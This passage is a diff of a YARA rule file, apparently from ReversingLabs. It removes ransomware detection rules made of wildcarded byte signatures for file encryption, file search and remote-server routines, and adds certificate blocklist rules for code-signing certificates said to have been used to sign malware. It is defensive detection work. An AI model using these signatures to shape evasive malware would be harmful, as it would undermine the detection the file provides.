-	strings:
-		$encrypt_files = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A
-            ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? 8B 4D ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 83 C8 ?? E9
-            ?? ?? ?? ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ??
-            ?? ?? ?? ?? 75 ?? 83 C8 ?? E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83
-            BD ?? ?? ?? ?? ?? 75 ?? 83 C8 ?? E9 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ??
-            ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 8D ?? ??
-            ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75
-            ?? 83 C8 ?? E9 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ??
-            ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 D0 85 D2 75 ?? 83 7D ?? ?? 74 ?? 6A
-            ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ??
-            68 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ??
-            75 ?? 83 C8 ?? EB ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ??
-            ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 8B 4D ??
-            33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$remote_server = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ??
-            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 6A ?? 6A ?? 68 ?? ?? ??
-            ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 6A ?? 6A
-            ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 68 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D
-            ?? ?? 74 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45
-            ?? 83 7D ?? ?? 74 ?? 6A ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75
-            ?? 83 C8 ?? E9 ?? ?? ?? ?? 8B 4D ?? 83 C1 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83
-            7D ?? ?? 75 ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ?? 83 C2 ?? 52 6A ?? 8B 45
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 FF 15
-            ?? ?? ?? ?? 85 C0 75 ?? 83 C8 ?? E9 ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B
-            55 ?? 83 C2 ?? 89 55 ?? 8B 45 ?? 3B 45 ?? 73 ?? 8B 4D ?? 03 4D ?? 0F BE 11 83 FA ??
-            74 ?? 8B 45 ?? 03 45 ?? 0F BE 08 83 F9 ?? 74 ?? 8B 55 ?? 03 55 ?? 8B 45 ?? 03 45 ??
-            8A 08 88 0A EB ?? 8B 55 ?? 03 55 ?? C6 02 ?? EB ?? EB ?? EB ?? 83 7D ?? ?? 0F 87 ??
-            ?? ?? ?? 83 7D ?? ?? 75 ?? 83 C8 ?? EB ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 FF 15 ?? ??
-            ?? ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 55 ?? 52
-            FF 15 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$remote_server_2 = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 89 45 ?? A1 ?? ?? ?? ?? 50 8B 0D ?? ?? ?? ?? 51 8B 15 ?? ?? ?? ?? 52
-            A1 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 8B 0D ?? ?? ?? ?? 51 68
-            ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ??
-            52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            89 45 ?? 83 7D ?? ?? 74 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ??
-            ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 68
-            ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
-            ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 6A ?? 6A ?? 6A ?? 6A ??
-            6A ?? 6A ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 6A ?? 8B 55 ??
-            52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D
-            45 ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 E9 ?? ?? ?? ?? 8B 55 ?? 83
-            C2 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 75 ?? C7 45 ?? ?? ?? ?? ?? 33
-            C0 E9 ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 50 6A ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33
-            C0 EB ?? EB ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 8B 4D ??
-            51 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 74 ?? B8 ?? ?? ?? ?? EB ?? 83 7D ?? ?? 0F 87 ??
-            ?? ?? ?? 83 7D ?? ?? 75 ?? 83 C8 ?? EB ?? 83 7D ?? ?? 74 ?? 8B 55 ?? 52 FF 15 ?? ??
-            ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 51
-            FF 15 ?? ?? ?? ?? 8B E5 5D C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AATB ApS" and ( pe.signatures [ i ] . serial == "00:84:a4:a0:d0:65:7e:21:7b:17:6b:45:5e:24:65:ae:e0" or pe.signatures [ i ] . serial == "84:a4:a0:d0:65:7e:21:7b:17:6b:45:5e:24:65:ae:e0" ) and 1616457600 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_B8F726508Cf1D7B7913Bf4Bbd1E5C19C : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "eb441b57-0f28-5609-b987-157e1f026b0c"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11804-L11822"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ec05c7e41e309aff00ae819c63f5bdc8e4172c611779da345efd211e48c9efb1"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $encrypt_files and $remote_server and $remote_server_2
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Merkuri LLC" and ( pe.signatures [ i ] . serial == "00:b8:f7:26:50:8c:f1:d7:b7:91:3b:f4:bb:d1:e5:c1:9c" or pe.signatures [ i ] . serial == "b8:f7:26:50:8c:f1:d7:b7:91:3b:f4:bb:d1:e5:c1:9c" ) and 1619568000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Sevensevenseven : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6A241Ffe96A6349Df608D22C02942268 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects SevenSevenSeven ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "049531bd-9505-5da1-9512-980383c8c5ec"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "8a8decfe-c91a-562c-9376-462cab598373"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.SevenSevenSeven.yara#L1-L148"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "583a8ac746cd749bd3927f10c864a3ac84f82f8bbd8d0ebf117e22b016d7ca94"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11824-L11840"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "79db8be7ca3ed80eb1e3a9401e8fec2b83da8b95b16789ed0b59bb7f4639a94d"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "SevenSevenSeven"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$file_search_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ??
-            ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 45 ?? 53 56 57 89 65 ?? BE ?? ?? ?? ?? 89 75
-            ?? 33 DB 89 5D ?? 88 5D ?? 89 75 ?? 89 5D ?? 88 5D ?? 89 75 ?? 88 5D ?? 68 ?? ?? ??
-            ?? 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 53 50 8D 4D ?? E8
-            ?? ?? ?? ?? BF ?? ?? ?? ?? 39 BD ?? ?? ?? ?? 72 ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ??
-            ?? 83 C4 ?? 39 7D ?? 8B 45 ?? 73 ?? 8D 45 ?? 8D 8D ?? ?? ?? ?? 51 50 FF 15 ?? ?? ??
-            ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? EB ?? BE ?? ?? ?? ?? 90 6A ?? 53 8D
-            4D ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8B 45 ?? 50 8D 8D ?? ?? ??
-            ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ??
-            53 50 8D 4D ?? E8 ?? ?? ?? ?? 39 BD ?? ?? ?? ?? 72 ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 89 B5 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? 39 BD ?? ?? ??
-            ?? 72 ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 B5 ?? ?? ?? ?? 89 9D ?? ??
-            ?? ?? 88 9D ?? ?? ?? ?? 39 7D ?? 8B 75 ?? 73 ?? 8D 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ??
-            ?? ?? ?? 85 C0 74 ?? B8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0
-        }
-		$file_search_p2 = {
-            74 ?? B8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? F7 D8 1B C0 F7 D8 3B
-            C3 0F 85 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74
-            ?? 8B 45 ?? 3A C3 0F 84 ?? ?? ?? ?? 50 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 3B
-            F3 0F 84 ?? ?? ?? ?? 39 7D ?? 72 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 39 7D ?? 72
-            ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 89 5D ?? 88 5D ?? 39 7D
-            ?? 0F 82 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 E9 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 38 1E 74 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ??
-            ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF
-            15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 89 5D ??
-            39 7D ?? 8B 45 ?? 73 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? EB
-            ?? B8 ?? ?? ?? ?? C3
-        }
-		$encrypt_file_1 = {
-            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 55 8B AC 24 ?? ?? ?? ?? 56 55 89 84 24 ?? ?? ?? ??
-            33 F6 FF 15 ?? ?? ?? ?? 33 C9 85 C0 76 ?? 8D 9B ?? ?? ?? ?? 80 3C 29 ?? 75 ?? 46 41
-            3B C8 72 ?? 83 FE ?? 75 ?? 5E 33 C0 5D 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 ??
-            ?? ?? ?? C3 57 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 8B
-            F8 83 FF ?? 75 ?? 5F 5E 33 C0 5D 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ??
-            ?? C3 53 6A ?? 57 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 73 ?? 57 FF 15 ?? ?? ?? ?? 5B 5F
-            5E 33 C0 5D 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 53 6A ?? FF 15
-            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 57 8B F0 FF 15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 53 56
-            57 FF 15 ?? ?? ?? ?? 33 C0 85 DB 76 ?? 8D 49 ?? 80 34 30 ?? 40 3B C3 72 ?? 6A ?? 6A
-            ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 51 53 56 57 FF 15 ?? ?? ?? ?? 57 FF
-            15 ?? ?? ?? ?? 8D 54 24 ?? 52 FF 15 ?? ?? ?? ?? 0F B7 44 24 ?? 0F B7 4C 24 ?? 0F B7
-            54 24 ?? 68 ?? ?? ?? ?? 50 0F B7 44 24 ?? 51 0F B7 4C 24 ?? 52 0F B7 54 24 ?? 50 51
-            52 55 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 51 68 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 52 55 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B
-            8C 24 ?? ?? ?? ?? 5B 5F 5E B8 ?? ?? ?? ?? 5D E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
-        }
-		$encrypt_file_2 = {
-            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 55 8B AC 24 ?? ?? ?? ?? 56 55 89 84 24 ?? ?? ?? ??
-            33 F6 FF 15 ?? ?? ?? ?? 33 C9 85 C0 76 ?? 8D 9B ?? ?? ?? ?? 80 3C 29 ?? 75 ?? 46 41
-            3B C8 72 ?? 83 FE ?? 74 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 55 FF 15 ??
-            ?? ?? ?? 8B F0 83 FE ?? 75 ?? 5E 33 C0 5D 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4
-            ?? ?? ?? ?? C3 53 6A ?? 56 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 73 ?? 56 FF 15 ?? ?? ??
-            ?? 5B 5E 33 C0 5D 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 57 8D 83
-            ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 8B F8 FF 15 ?? ?? ?? ??
-            6A ?? 8D 4C 24 ?? 51 53 57 56 FF 15 ?? ?? ?? ?? 8B CB C1 E9 ?? 41 74 ?? 8D 47 ?? B2
-            ?? 80 70 ?? ?? 80 70 ?? ?? 80 30 ?? 80 70 ?? ?? 80 70 ?? ?? 80 70 ?? ?? 80 70 ?? ??
-            30 50 ?? 83 C0 ?? 49 75 ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 54 24 ??
-            52 53 57 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ??
-            0F B7 4C 24 ?? 0F B7 54 24 ?? 0F B7 44 24 ?? 68 ?? ?? ?? ?? 51 0F B7 4C 24 ?? 52 0F
-            B7 54 24 ?? 50 0F B7 44 24 ?? 51 52 50 55 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 FF 15 ?? ??
-            ?? ?? 8D 54 24 ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 55 FF 15
-            ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5B 5E B8 ?? ?? ?? ?? 5D E8
-            ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
-        }
-		$remote_server_1 = {
-            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 53 55 56 57 68 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
-            ?? 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 33 FF 57 6A ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 89 44 24 ?? 33 DB
-            BD ?? ?? ?? ?? 8B 44 24 ?? BA ?? ?? ?? ?? 8B CB D3 E2 85 D0 0F 84 ?? ?? ?? ?? 8A CB
-            8D 54 24 ?? 80 C1 ?? 52 88 4C 24 ?? 66 C7 44 24 ?? ?? ?? FF D6 83 F8 ?? 74 ?? 8D 44
-            24 ?? 50 FF D6 83 F8 ?? 75 ?? 8D 44 24 ?? 89 6C 24 ?? 89 7C 24 ?? C6 44 24 ?? ?? 8D
-            50 ?? 8A 08 40 84 C9 75 ?? 2B C2 50 8D 4C 24 ?? 51 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 54
-            24 ?? 6A ?? 52 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 83 F8 ?? 72 ?? 8B 44 24 ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 89 6C 24 ?? 89 7C 24 ?? C6 44 24 ?? ?? 43 83 FB ?? 0F 8C ?? ??
-            ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ??
-            ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5D 33 C0 5B E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C2
-        }
-		$remote_server_2 = {
-            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 57 33 FF 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 89 84
-            24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 66 83 7C 24 ?? ??
-            0F 85 ?? ?? ?? ?? 66 83 7C 24 ?? ?? 0F 87 ?? ?? ?? ?? 53 55 56 68 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ??
-            8D 94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? 57 6A ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 89 44 24 ?? 33 DB BD ?? ??
-            ?? ?? 8B CB B8 ?? ?? ?? ?? D3 E0 8B 4C 24 ?? 85 C1 0F 84 ?? ?? ?? ?? 8A D3 8D 44 24
-            ?? 80 C2 ?? 50 88 54 24 ?? 66 C7 44 24 ?? ?? ?? FF D6 83 F8 ?? 74 ?? 8D 4C 24 ?? 51
-            FF D6 83 F8 ?? 75 ?? 8D 44 24 ?? 89 6C 24 ?? 89 7C 24 ?? C6 44 24 ?? ?? 8D 50 ?? 8A
-            08 40 84 C9 75 ?? 2B C2 50 8D 54 24 ?? 52 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 6A
-            ?? 50 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 83 F8 ?? 72 ?? 8B 4C 24 ?? 51 E8 ?? ?? ??
-            ?? 83 C4 ?? 89 6C 24 ?? 89 7C 24 ?? C6 44 24 ?? ?? 43 83 FB ?? 0F 8C ?? ?? ?? ?? E8
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B
-            8C 24 ?? ?? ?? ?? 5E 5D 5B 33 C0 5F E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C2 ?? ?? 57 FF
-            15
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HELP, d.o.o." and pe.signatures [ i ] . serial == "6a:24:1f:fe:96:a6:34:9d:f6:08:d2:2c:02:94:22:68" and 1605052800 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_Aa1D84779792B57F91Fe7A4Bde041942 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "8ec25296-2e51-53ec-a2f5-a25961079c27"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11842-L11860"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "682af8c799acaca531724c5b3184b855e64ec4531fcc333a485ba2f63331cdae"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $file_search_p* ) ) and ( ( ( $encrypt_file_1 ) and ( $remote_server_1 ) ) or ( ( $encrypt_file_2 ) and ( $remote_server_2 ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AXIUM NORTHWESTERN HYDRO INC." and ( pe.signatures [ i ] . serial == "00:aa:1d:84:77:97:92:b5:7f:91:fe:7a:4b:de:04:19:42" or pe.signatures [ i ] . serial == "aa:1d:84:77:97:92:b5:7f:91:fe:7a:4b:de:04:19:42" ) and 1639872000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Erica : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_3C98B6872Fbb1F4Ae37A4Caa749D24C2 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Erica ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "38f57157-bd49-5a63-8c69-497eb9efe274"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "f4cc9c94-eb96-5380-9e12-cab5ec010ab8"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Erica.yara#L1-L76"
